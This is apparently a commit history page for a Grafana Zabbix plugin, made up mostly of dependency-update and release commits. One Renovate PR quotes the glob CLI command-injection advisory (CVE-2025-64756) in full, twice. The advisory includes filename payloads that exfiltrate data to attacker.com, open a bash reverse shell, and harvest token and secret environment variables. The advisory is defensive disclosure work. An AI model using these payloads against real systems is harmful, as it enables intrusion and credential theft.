This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`^7.21.4` -> `^7.28.4`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.4/7.28.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.5`](https://redirect.github.com/babel/babel/blob/HEAD/CHANGELOG.md#v7285-2025-10-23) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.4...v7.28.5) ##### 👓 Spec Compliance - `babel-parser` - [#​17446](https://redirect.github.com/babel/babel/pull/17446) Allow `Runtime Errors for Function Call Assignment Targets` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-validator-identifier` - [#​17501](https://redirect.github.com/babel/babel/pull/17501) fix: update identifier to unicode 17 ([@​fisker](https://redirect.github.com/fisker)) ##### 🐛 Bug Fix - `babel-plugin-proposal-destructuring-private` - [#​17534](https://redirect.github.com/babel/babel/pull/17534) Allow mixing private destructuring and rest ([@​CO0Ki3](https://redirect.github.com/CO0Ki3)) - `babel-parser` - [#​17521](https://redirect.github.com/babel/babel/pull/17521) Improve `@babel/parser` error typing ([@​JLHwung](https://redirect.github.com/JLHwung)) - [#​17491](https://redirect.github.com/babel/babel/pull/17491) fix: improve ts-only declaration parsing ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-proposal-discard-binding`, `babel-plugin-transform-destructuring` - [#​17519](https://redirect.github.com/babel/babel/pull/17519) fix: `rest` correctly returns plain array ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-create-class-features-plugin`, `babel-helper-member-expression-to-functions`, `babel-plugin-transform-block-scoping`, `babel-plugin-transform-optional-chaining`, `babel-traverse`, `babel-types` - [#​17503](https://redirect.github.com/babel/babel/pull/17503) Fix `JSXIdentifier` handling in `isReferencedIdentifier` ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-traverse` - [#​17504](https://redirect.github.com/babel/babel/pull/17504) fix: ensure scope.push register in anonymous fn ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-types` - [#​17494](https://redirect.github.com/babel/babel/pull/17494) Type checking babel-types scripts ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### :running\_woman: Performance - `babel-core` - [#​17490](https://redirect.github.com/babel/babel/pull/17490) Faster finding of locations in `buildCodeFrameError` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4xMi4xIiwidXBkYXRlZEluVmVyIjoiNDIuMTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
46a0157d70 |
fix(deps): pin dependencies (#2104)
This PR contains the following updates: | Package | Type | Update | Change | Age | Confidence | |---|---|---|---|---|---| | [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react)) | devDependencies | pin | [`^18.2.25` -> `18.3.24`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.24/18.3.24) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react-dom](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react-dom)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react-dom/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Release Notes <details> <summary>facebook/react (react)</summary> ### [`v18.3.1`](https://redirect.github.com/facebook/react/blob/HEAD/CHANGELOG.md#1831-April-26-2024) [Compare Source](https://redirect.github.com/facebook/react/compare/v18.3.0...v18.3.1) - Export `act` from `react` [f1338f]( |
||
|
renovate-sh-app[bot]
|
5790b9a68d |
chore(deps): update dependency glob to v11 [security] (#2122)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[
|
||
|
ismail simsek
|
d4e717c757 | Release v6.0.3 (#2102) | ||
|
Zoltán Bedi
|
1f6ba92d96 | Release 6.0.2 (#2091) | ||
|
Zoltán Bedi
|
0194360f61 | Release 6.0.1 (#2088) | ||
|
Zoltán Bedi
|
e559459a96 |
Release 6.0.0 (#2084)
Co-authored-by: Kristian Bremberg <114284895+KristianGrafana@users.noreply.github.com> |
||
github-actions[bot]
|
b13d567eee |
chore: bump @grafana/create-plugin configuration to 5.26.4 (#2082)
Bumps [`@grafana/create-plugin`](https://github.com/grafana/plugin-tools/tree/main/packages/create-plugin) configuration from 4.2.1 to 5.26.4. **Notes for reviewer:** This is an auto-generated PR which ran `@grafana/create-plugin update`. Please consult the create-plugin [CHANGELOG.md](https://github.com/grafana/plugin-tools/blob/main/packages/create-plugin/CHANGELOG.md) to understand what may have changed. Please review the changes thoroughly before merging. --------- Co-authored-by: grafana-plugins-platform-bot[bot] <144369747+grafana-plugins-platform-bot[bot]@users.noreply.github.com> Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Zoltán Bedi
|
fb6b95b92b | Release 5.2.1 (#2066) | ||
|
Zoltán Bedi
|
7e0070e4f6 | Release: Bump version to 5.2.0 and update changelog for new features and fixes (#2054) | ||
|
Zoltán Bedi
|
764a945fb0 | Chore: update version to 5.1.0 and update changelog (#2026) | ||
|
Zoltán Bedi
|
db7d5b3cb9 |
Release version 5.0.4 with a fix for TLS handshake timeout issues by … (#2000)
…disabling the post-quantum key exchange mechanism in Go. |
||
|
Zoltán Bedi
|
0594cc8ab0 | Update prismjs dependency to version 1.30.0 (#1999) | ||
|
Zoltán Bedi
|
bc6211568f |
Release version 5.0.3 with security updates and bug fixes (#1995)
- Updated golang.org/x/net from v0.35.0 to v0.37.0 for security improvements. - Built the plugin with Go version 1.24.1. - Fixed basic authentication issues for Zabbix versions <7.2. - Bumped grafana-plugin-sdk-go from v0.270.0 to v0.274.0. |
||
Ivana Huckova
|
58902e7ed9 |
Release 5.0.2 with error source fix for some downstream errors (#1980)
This PR fixes error source for 2 errors: - parsing of invalid json response should be downstream error as we expect to receive valid json from zabbix - no host found error should be downstream. We are bumping sdk that includes that fix https://github.com/grafana/grafana-plugin-sdk-go/pull/1246. As you can see - the invalid json parsing is now downstream error <img width="1498" alt="image" src="https://github.com/user-attachments/assets/88028dbe-0f73-47aa-8262-5729059ce12f" /> |
||
|
Ivana Huckova
|
d28a715bb1 | Release 5.0.1 (#1976) | ||
|
Zoltán Bedi
|
aa63bb8835 |
Add Changesets configuration and update development documentation (#1964)
Introduce Changesets for versioning and changelog generation, and enhance development documentation to guide contributors on using Changesets effectively. |
||
Gareth Dawson
|
525217ddad |
Add E2E smoke test (#1962)
creates a smoke test for the zabbix data source closes https://github.com/grafana/data-sources/issues/194 |